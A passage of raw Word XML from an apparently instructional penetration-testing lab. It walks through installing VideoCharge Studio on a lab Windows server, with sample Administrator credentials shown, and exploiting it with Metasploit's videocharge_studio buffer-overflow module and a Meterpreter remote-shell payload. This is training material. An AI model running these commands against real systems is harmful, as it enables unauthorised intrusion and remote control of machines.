        </w:rPr>
        <w:t>\\172.19.19.20</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, provide </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Windows Server 2019</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> credentials i.e.,</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>Username: </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Administrator</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Password: </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Pa$$w0rd</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>and click </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4218FEA6" w14:textId="77777777" w:rsidR="005369DA" w:rsidRPr="005369DA" w:rsidRDefault="005369DA" w:rsidP="005369DA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFE0E0"/>
        <w:spacing w:before="100" w:before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If an </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Open File - Security Warning</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> pop-up window appears, click </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Run</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EDF4D4" w14:textId="4345F51A"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3967765E" wp14:editId="28A0FE3B">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1766165048"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AD650A4" w14:textId="70E74CFB"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5134D960">
          <v:shape id="_x0000_i1147" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId7" o:title=""/>
          </v:shape>
          <w:control r:id="rId12" w:name="DefaultOcxName2" w:shapeid="_x0000_i1147"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>VideoCharge</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Studio - InstallShield Wizard</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> appears, click </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Next</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> to continue. Accept the license agreement and then, follow the wizard-driven installation steps to install the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE0856F" w14:textId="6BF4B2D5"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38420EC" wp14:editId="0A3D47B5">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="813415319"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26BD5DB" w14:textId="163D6574"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2EEFF0E7">
          <v:shape id="_x0000_i1146" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId7" o:title=""/>
          </v:shape>
          <w:control r:id="rId14" w:name="DefaultOcxName3" w:shapeid="_x0000_i1146"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>At the end of the installation, click </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Finish</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. If a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Language</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> pop-up appears, click </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (meaning we are selecting </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>English</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> as the default language).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF806EE" w14:textId="48FB46CA"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45F98870" wp14:editId="063F6466">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="20899591"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F2EA02A" w14:textId="62771C68"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10F40536">
          <v:shape id="_x0000_i1145" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId7" o:title=""/>
          </v:shape>
          <w:control r:id="rId16" w:name="DefaultOcxName4" w:shapeid="_x0000_i1145"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>VideoCharge</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Studio Trial version pop-up appears, click on the </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Quit</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> button to close the window. Also, close the navigated window where the installer file is located.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC364F1" w14:textId="268E544B"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C7897E5" wp14:editId="66C1740F">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="980009887"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5044ACA" w14:textId="6B94EB58" w:rsidR="005369DA" w:rsidRPr="005369DA" w:rsidRDefault="005369DA" w:rsidP="005369DA">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39681DA2">
          <v:shape id="_x0000_i1144" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId7" o:title=""/>
          </v:shape>
          <w:control r:id="rId18" w:name="DefaultOcxName5" w:shapeid="_x0000_i1144"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Click </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="005369DA">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0067B8"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Parrot</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. Parrot lock screen appears.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B60E09" w14:textId="56C372A1"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6A45A9FD" wp14:editId="1A660466">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="459254987"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345436B" w14:textId="6FCAFC28"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0D973C75">
          <v:shape id="_x0000_i1143" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId7" o:title=""/>
          </v:shape>
          <w:control r:id="rId21" w:name="DefaultOcxName6" w:shapeid="_x0000_i1143"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">By </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pentester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> is selected as the </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. Type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>toor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> in the Password field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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333812AC" w14:textId="256278B1"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DF71D68" wp14:editId="1A0AA4D6">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="2043879721"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931302C" w14:textId="24833B57"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0C3014DF">
          <v:shape id="_x0000_i1142" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId7" o:title=""/>
          </v:shape>
          <w:control r:id="rId23" w:name="DefaultOcxName7" w:shapeid="_x0000_i1142"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Launch a command line terminal, type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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to launch the Metasploit framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F11B9BD" w14:textId="0D3FA9F3"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2B9D6CAE" wp14:editId="79996835">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="2037112992"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60F5284" w14:textId="0BD0BF89"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515F157E">
          <v:shape id="_x0000_i1141" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId7" o:title=""/>
          </v:shape>
          <w:control r:id="rId25" w:name="DefaultOcxName8" w:shapeid="_x0000_i1141"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, we shall search through the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> database for a suitable exploit. Type </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>videocharge</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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This returns the exploit(s) related to the application. We will be using this exploit to perform buffer overflow on the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DD570A" w14:textId="6FCA3095"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47C86B26" wp14:editId="4D1D1562">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="859196229"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A60E03E" w14:textId="089D3123"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6EC36B9E">
          <v:shape id="_x0000_i1140" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId7" o:title=""/>
          </v:shape>
          <w:control r:id="rId27" w:name="DefaultOcxName9" w:shapeid="_x0000_i1140"/>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use exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>fileformat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>videocharge_studio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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If we are assigning any payload to the exploit, this will take default payload as </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>set payload windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
